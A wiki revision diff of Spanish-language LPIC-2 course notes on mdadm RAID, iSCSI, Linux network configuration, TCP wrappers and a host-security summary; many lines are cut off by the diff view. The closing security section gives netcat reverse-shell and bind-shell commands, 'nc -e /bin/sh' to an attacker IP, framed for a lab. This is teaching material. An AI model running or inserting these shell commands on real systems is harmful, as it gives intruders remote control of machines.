Diferències
Ací es mostren les diferències entre la revisió seleccionada i la versió actual de la pàgina.
Ambdós costats versió prèvia Revisió prèvia Següent revisió | Revisió prèvia | ||
info:cursos:pue:lpic2-2021:s7 [23/02/2021 10:24] – mate | info:cursos:pue:lpic2-2021:s7 [18/09/2022 23:47] (actual) – [LPIC2 2021 Sesión 7 (2021-02-23)] mate | ||
---|---|---|---|
Línia 1: | Línia 1: | ||
- | = LPIC2 2021 Sesión 7 (2021-02-23) | + | = LPIC2 2021 Sesión 7 (2021-02-23) |
== Documentación relacionada: | == Documentación relacionada: | ||
* Manual Certificacion LPIC-2.pdf, pag 72 | * Manual Certificacion LPIC-2.pdf, pag 72 | ||
Línia 10: | Línia 10: | ||
== Clase | == Clase | ||
=== RAID | === RAID | ||
- | * documentación: | + | <callout type=" |
- | * Material Practicas LPIC-2/ | + | <callout type=" |
- | | + | |
* en certificación no preguntan por que es cada RAID (0,1,5,6) | * en certificación no preguntan por que es cada RAID (0,1,5,6) | ||
- | * '' | + | * '' |
+ | * **-C**: crear volume RAID | ||
+ | * **%%--%%create** | ||
+ | * **-S**: desactiva RAID y recursos | ||
+ | * **-v**: verbose | ||
+ | * **%%--%%verbose** | ||
+ | * **/ | ||
+ | * **-l**: nivel de raid: 0,1,5 | ||
+ | * **%%--%%level** | ||
+ | * **-n** | ||
+ | * **%%--%%raid-devices** | ||
+ | * **-D**: comprobación del volumen | ||
+ | * **/ | ||
+ | * **%%--%%spare-devices=< | ||
+ | * **%%--%%detail**: | ||
+ | * **-f < | ||
+ | * **%%--%%fail** | ||
+ | * OJO con raid 0, pueden perderse datos dependiendo de la confiración del spare | ||
+ | * **-r < | ||
+ | * **%%--%%remove** | ||
+ | * **-a < | ||
+ | * **%%--%%add** | ||
+ | * **%%--%%stop**: | ||
+ | * **%%--%%remove**: | ||
+ | * intent bitmap: | ||
+ | * Una cosa importante es contar con el Intent Bitmap activo, esto es una característica que se le agrega a un arreglo por software y permite hacer sincronizaciones diferenciales entre los discos tras producirse una falla, reduciendo asi los tiempos al no tener que sincronizar el disco completo cada vez que algo ocurre. | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * **%%--%%query [< | ||
+ | * **%%--%%examine < | ||
* **/ | * **/ | ||
- | <callout type=" | + | * '' |
+ | * **mdadm** no depende de este fichero de configuración para su funcionamiento. Es una manera adicińal de seguir las pista. | ||
+ | * **/etc/ | ||
+ | | ||
<callout type=" | <callout type=" | ||
- | ==== Laboratorio | + | ==== Laboratorio |
+ | <callout type=" | ||
* crear partición (100%) del tipo Linux RAID **fd** en los discos sdb,sdc,sdd | * crear partición (100%) del tipo Linux RAID **fd** en los discos sdb,sdc,sdd | ||
- | * '' | + | * '' |
* nuevo dispositivo **/ | * nuevo dispositivo **/ | ||
* el nombre ha de ser **/ | * el nombre ha de ser **/ | ||
Línia 30: | Línia 62: | ||
* '' | * '' | ||
* '' | * '' | ||
- | * dejamos en terminal abierto una monitorización sobre el RAID: '' | + | * dejamos en terminal abierto una monitorización sobre el RAID: '' |
* forzamos el fallo de uno de los discos: '' | * forzamos el fallo de uno de los discos: '' | ||
* podemos ver en el terminal de **watch** como el sistema reemplaza el sdb1 por el spare sdd1 | * podemos ver en el terminal de **watch** como el sistema reemplaza el sdb1 por el spare sdd1 | ||
Línia 38: | Línia 70: | ||
* para eliminar el raid: | * para eliminar el raid: | ||
* '' | * '' | ||
- | * '' | + | * '' |
- | * '' | + | * '' |
- | * es importante eliminar el superbloque (metadatos): | + | * es importante eliminar el superbloque (metadatos): |
* eliminar configuración: | * eliminar configuración: | ||
* otro comando: '' | * otro comando: '' | ||
Línia 48: | Línia 80: | ||
==== Laboratorio (extra) | ==== Laboratorio (extra) | ||
Sacar un disco de un raid existente y montarlo en un nuevo ordenador, como nuevo raid, para acceder a los datos contenidos | Sacar un disco de un raid existente y montarlo en un nuevo ordenador, como nuevo raid, para acceder a los datos contenidos | ||
- | * '' | + | * '' |
* '' | * '' | ||
=== Cabina ISCSI | === Cabina ISCSI | ||
- | <callout type=" | + | <callout type=" |
- | | + | <callout type=" |
* cabinas con openfiler, para conectarnos | * cabinas con openfiler, para conectarnos | ||
* [[http:// | * [[http:// | ||
Línia 60: | Línia 92: | ||
=== Networking Configuration | === Networking Configuration | ||
- | | + | <callout type=" |
- | * | + | <callout type=" |
- | * Material Practicas LPIC-2/ | + | <callout type=" |
+ | |||
+ | * [[tcpip: | ||
+ | |||
+ | === Networking Configuration: | ||
+ | * '' | ||
+ | * nombrar las tarjetas de red a **ethX**: | ||
+ | | ||
+ | * modificar **/ | ||
+ | * < | ||
+ | * archivo de configuración centos/ | ||
+ | * al modificar: **systemctl restart network**, **ip link set < | ||
+ | * desactivar IPv6 (si no se ha de utilizar) -> ¿como? | ||
+ | * **NetworkManager**: | ||
+ | ==== hostname | ||
+ | * centos7: | ||
+ | * **/ | ||
+ | * '' | ||
+ | * centos6: | ||
+ | * **/ | ||
+ | * modificar **/ | ||
+ | |||
+ | ==== configuración cliente DNS | ||
+ | * **/ | ||
+ | * nameserver: servidores que resuelven | ||
+ | * search: sufijo de búsqueda (lo que añade a los nombres que usamos para localizar máquinas) | ||
+ | * domain: el dominio en el que trabajamos | ||
+ | |||
+ | ==== puertas de enlace | ||
+ | definir rutas estáticas a otras redes | ||
+ | * '' | ||
+ | * '' | ||
+ | |||
+ | ==== alias IP | ||
+ | asignar varias IPs en el mismo interfaz | ||
+ | * '' | ||
+ | * renombro IPADDR a IPADDR0 y NETMASK a NETMASK0 | ||
+ | * añado IPADDR1 y NETMASK1 con diferente IP | ||
+ | * '' | ||
+ | * copiar / | ||
+ | * forward paquetes (reenvio de paquetes entre 2 redes en 2 interfaces: | ||
+ | * **/ | ||
+ | |||
+ | * **/ | ||
+ | * **nmtui**: networkManager " | ||
+ | * '' | ||
+ | * **nmcli**: networkManager " | ||
+ | * '' | ||
+ | * nos permite crear los ficheros de configuración (desde cero) en un comando | ||
+ | * debian: | ||
+ | * **/ | ||
+ | * '' | ||
+ | |||
+ | ==== arp | ||
+ | * '' | ||
+ | * **-n**: consultar caché | ||
+ | * **-d < | ||
+ | * **-s < | ||
+ | * **-f < | ||
+ | dirección_macndirección_ip1 | ||
+ | dirección_ip2 | ||
+ | dirección_ipn | ||
+ | </ | ||
+ | |||
+ | === Networking Configuration: | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * shell reverso | ||
+ | * '' | ||
+ | * '' | ||
+ | * **/ | ||
+ | * y reiniciar (no hay servicio que controle esto) | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * [[info: | ||
+ | * '' | ||
+ | |||
+ | === Networking Configuration: | ||
+ | <callout type=" | ||
+ | Es posible administrar el acceso a un sistema Linux según la dirección IP o el nombre del host cliente. Se puede gestionar una lista de «todos los que están autorizados», | ||
+ | |||
+ | La implementación TCP Wrappers utilizada en los sistemas Linux se sustenta en la librería libwrap. | ||
+ | |||
+ | * **/ | ||
+ | * '' | ||
+ | * 3 etapas de comprobación de acceso a un servicio embebido TCP: | ||
+ | * está autorizado expresamente | ||
+ | * está denegado expresamente | ||
+ | * permitido por defecto | ||
+ | * usa expresiones en sus ficheros de configuración para permitir (o denegar) | ||
+ | * ALL | ||
+ | * LOCAL | ||
+ | * UNKOWN | ||
+ | * KNOWN | ||
+ | * PARANOID | ||
+ | * EXCEPT | ||
+ | * permitimos en **allow**, denegamos en **deny** (o tendrá acceso por la tercera regla) | ||
+ | <callout type=" | ||
+ | |||
+ | === Resumen seguridad servicios | ||
+ | <callout type=" | ||
+ | < | ||
+ | Resumen Seguridad de servicos y de red pagina 479 Manual curso LPIC-1 | ||
+ | |||
+ | |||
+ | find / -type f -perm -4000 | ||
+ | find / -type d -perm -2000 | ||
+ | find / -type d -perm -1000 | ||
+ | |||
+ | ##El comando lsof le ayuda a determinar | ||
+ | ##qué proceso está utilizando un archivo del punto de montaje en el momento de iniciar el comando | ||
+ | lsof /backup/ | ||
+ | lsof /backup/ | ||
+ | COMMAND | ||
+ | bash 8153 root cwd DIR | ||
+ | |||
+ | ##Como administrador, | ||
+ | fuser -km /backup | ||
+ | kill -9 8153 | ||
+ | |||
+ | El comando nmap es un escaneador de puertos: | ||
+ | yum install nmap -y | ||
+ | nmap localhost | ||
+ | namap -A 192.168.1.125 | ||
+ | |||
+ | yum install nmap-frontend -y | ||
+ | zenmap | ||
+ | ----------------------------------------------------------------------------------------------------------------- | ||
+ | ###110.2 Setup host security## | ||
+ | |||
+ | Servicios de red xinetd -->Pag del manual 419 | ||
+ | yum install xinetd | ||
+ | |||
+ | Los archivos de configuración son: | ||
+ | • / | ||
+ | • / | ||
+ | Existe un archivo por servicio, con el mismo nombre que el especificado en / | ||
+ | |||
+ | ##Si modificamos ficheros de configuracion reiniciamos los servicios | ||
+ | service xinetd restart | ||
+ | --------------------------------------------------------------------------------------------- | ||
+ | ############# | ||
+ | |||
+ | ##Resumen manual de LPIC-1 pagina 484 | ||
+ | Los archivos de configuración son / | ||
+ | |||
+ | ##Cada programa que utiliza los tcp_wrappersse compila con la librería libwrap de manera estática | ||
+ | (el comando ldd no permite ver la librería). | ||
+ | |||
+ | [root@sercentos7 ~]# strings -f / | ||
+ | / | ||
+ | |||
+ | Si no se devuelve ninguna línea, el programa no utiliza las tcp_wrappers. | ||
+ | Entre los servicios que utilizan las tcp_wrappers, | ||
+ | • sendmail (incluyendo postfix); | ||
+ | • sshd (ssh); | ||
+ | • xinetd (y por lo tanto de manera indirecta todos los servicios asociados); | ||
+ | • vsftpd (ftp); | ||
+ | • portmap (y por lo tanto nis, nfs); | ||
+ | • in.telnetd (telnet), así como la mayoría de los servicios soportados por xinetd; | ||
+ | |||
+ | La comprobación de acceso a un servicio embebido TCP se hace en tres etapas: | ||
+ | • ¿se autoriza el acceso de manera explícita? | ||
+ | • si no es el caso, ¿se prohíbe el acceso de manera explícita? | ||
+ | • si no es el caso, por defecto, se autoriza el acceso. | ||
+ | |||
+ | |||
+ | Para verificar una regla, el sistema lee primero / | ||
+ | La búsqueda se detiene en la primera correspondencia encontrada. | ||
+ | Una línea en hosts.allow autoriza la conexión. | ||
+ | Una línea en hosts.deny prohíbe la conexión. | ||
+ | Si no se deniega de manera explícita el acceso, se autoriza: la petición no corresponde a ningún criterio. | ||
+ | |||
+ | |||
+ | Los archivos de configuración son / | ||
+ | |||
+ | En el ejemplo siguiente: | ||
+ | • Sólo los miembros de la subred 192.168.1.0 tienen permiso para conectarse al servidor ftp (prohibido para todos los demás). | ||
+ | • Los anfitriones puesto1 y puesto2 tienen acceso a telnet y portmap. | ||
+ | • Los anfitriones de baddominio.org, | ||
+ | • Se prohíbe el servicio pop/imap a todos los de la red 192.168.0.0, | ||
+ | |||
+ | / | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | |||
+ | |||
+ | # / | ||
+ | ALL: .baddominio.org except trusted.baddominio.org UNKNOWN | ||
+ | | ||
+ | | ||
+ | |||
+ | La lista de clientes admite una sintaxis avanzada: | ||
+ | • ALL: correspondencia sistemática. | ||
+ | • LOCAL: todos los anfitriones cuyo nombre no contiene punto (puesto1, puesto2, etc.). | ||
+ | • UNKNOWN: anfitrión cuyo nombre no se puede resolver. | ||
+ | • KNOWN: anfitrión cuyo nombre se puede resolver. | ||
+ | • PARANOID: anfitrión cuyo nombre no se puede resolver o cuyo IP no tiene resolución inversa. | ||
+ | • EXCEPT: permite excluir ciertos anfitriones. | ||
+ | ------------------------------------------------------------------------------------------------------------ | ||
+ | ##Reverse Shell-Netcat: | ||
+ | yum install nc -y | ||
+ | $ sudo apt-get update -y | ||
+ | $ sudo apt-get install netcat -y | ||
+ | |||
+ | Este software esta presente en casi todas las distribuciones y es la manera mas sencilla de obener Reverse. | ||
+ | Aun así en los sistemas en producción no suele estar disponible. | ||
+ | |||
+ | ##En la máquina del atacante 192.168.33.10 Centos8: | ||
+ | nc -lvp 1234 | ||
+ | |||
+ | ##En la máquina de la víctima 192.168.33.11 debian-10: | ||
+ | nc -e /bin/sh 192.168.33.10 1234 | ||
+ | |||
+ | |||
+ | |||
+ | ###Bind Shell- Netcat####: | ||
+ | |||
+ | Una bind shell utilizando Netcat. Una bind shell se diferencia de la reverse en que la escucha se realiza en la máquina víctima. | ||
+ | |||
+ | Para el ejemplo la ip de la víctima será la 10.10.10.2 | ||
+ | |||
+ | ##En la máquina de la víctima debian-10 192.168.33.11: | ||
+ | nc -lvp 1234 -e /bin/sh & | ||
+ | |||
+ | ##En la máquina del atacante, 192.168.33.11 es la maquina victima: | ||
+ | nc 192.168.33.11 1234 | ||
+ | </ |